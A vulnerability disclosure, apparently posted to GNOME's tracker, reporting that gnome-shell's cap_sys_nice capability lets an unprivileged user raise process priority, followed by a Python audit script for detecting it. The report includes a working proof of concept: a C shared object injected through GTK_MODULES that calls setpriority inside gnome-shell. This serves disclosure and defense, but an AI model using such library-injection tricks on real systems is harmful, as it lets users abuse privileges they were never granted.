New Security Issue: CAP_SYS_NICE use
Original reporter: Marco Benatto
Area: Application
Message
Hello,
my name is Marco Benatto and I'm a Sr. Product Security Engineer at Red Hat. A short time ago we received a security report from an independent researcher about the usage of CAP_SYS_NICE on gnome-shell and how one can abuse it to raise the nice value from an unprivileged task. While we understand the final decision to give gnome-shell the CAP_SYS_NICE capability is up to distros/downstream, we'd like to assign a CVE (for notification purposes), explicitly mentioning that only distros that assign this capability to the referred component may be affected by this issue.
Please let me know your thoughts on this as I don't want to eventually step on upstream's toes.
The original report:
"Hello, I happened to notice a minor issue while working on a tool I'm writing. I'm not sure if gnome or the fedora package is to blame, but it seems gnome-shell is now given cap_sys_nice:
$ rpm -qf /bin/gnome-shell
gnome-shell-3.38.4-1.fc33.x86_64
$ getcap /bin/gnome-shell
/bin/gnome-shell cap_sys_nice=ep
This seems incorrect. Here is a demo, I'm just a regular user, and this pid has a priority of 0:
$ ps -heo nice -q 495980
0
I don't have permission to raise that:
$ renice -n -20 495980
renice: failed to set priority for 495980 (process ID): Permission denied
But it doesn't matter, I can just make gnome do it:
$ cat prio.c
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>

/* Runs when the shared object is loaded, i.e. inside the gnome-shell process. */
void __attribute__((constructor)) init() {
    setpriority(PRIO_PROCESS, 495980, -20);
    _exit(0);
}
$ gcc -fPIC -shared -o prio.so prio.c
$ env GTK_MODULES=/proc/self/cwd/prio.so /bin/gnome-shell --list-modes
And if I look at the priority now...
$ ps -heo nice -q 495980
-20"
Thanks,
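An added audit check, not part of the report above or of gnome-shell, that a defender can run to spot the two conditions the report describes: an unprivileged user's process running at a negative nice value (which it could not have set itself without CAP_SYS_NICE) and binaries carrying cap_sys_nice as a file capability. It assumes the `ps -eo pid,user,ni,comm` and `getcap -r` output formats; the sample lines embedded below are constructed, not captured from a real host.

```python
import re
import subprocess

# Constructed sample of `ps -eo pid,user,ni,comm` output (not from a real host).
SAMPLE_PS = """\
    PID USER      NI COMMAND
      1 root       0 systemd
    842 root     -20 kworker/0:0H
 495980 marco    -20 bash
 495990 marco      0 vim
   1200 gdm        - kthreadd
"""

# Constructed sample of `getcap -r` output (newer libcap "path cap=ep" style).
SAMPLE_GETCAP = """\
/bin/gnome-shell cap_sys_nice=ep
/usr/bin/ping cap_net_raw=ep
"""

PRIVILEGED_USERS = {"root"}


def unprivileged_negative_nice(ps_output, privileged=PRIVILEGED_USERS):
    """Return (pid, user, nice, comm) for non-privileged users' processes with nice < 0."""
    hits = []
    for line in ps_output.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 3)
        if len(fields) < 4:
            continue
        pid, user, nice, comm = fields
        if not re.fullmatch(r"-?\d+", nice):         # kernel threads may show '-'
            continue
        if user not in privileged and int(nice) < 0:
            hits.append((int(pid), user, int(nice), comm))
    return hits


def binaries_with_capability(getcap_output, cap="cap_sys_nice"):
    """Return paths whose file capabilities include `cap`; handles both
    'path cap_a,cap_b=ep' (libcap >= 2.41) and 'path = cap_a,cap_b+ep' styles."""
    found = []
    for line in getcap_output.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and cap in re.findall(r"cap_[a-z_]+", parts[1]):
            found.append(parts[0])
    return found


if __name__ == "__main__":
    try:  # live run; fall back to the constructed sample if ps is unavailable
        ps_out = subprocess.run(["ps", "-eo", "pid,user,ni,comm"],
                                capture_output=True, text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        ps_out = SAMPLE_PS
    print("negative nice, unprivileged owner:", unprivileged_negative_nice(ps_out))
    print("cap_sys_nice binaries:", binaries_with_capability(SAMPLE_GETCAP))
```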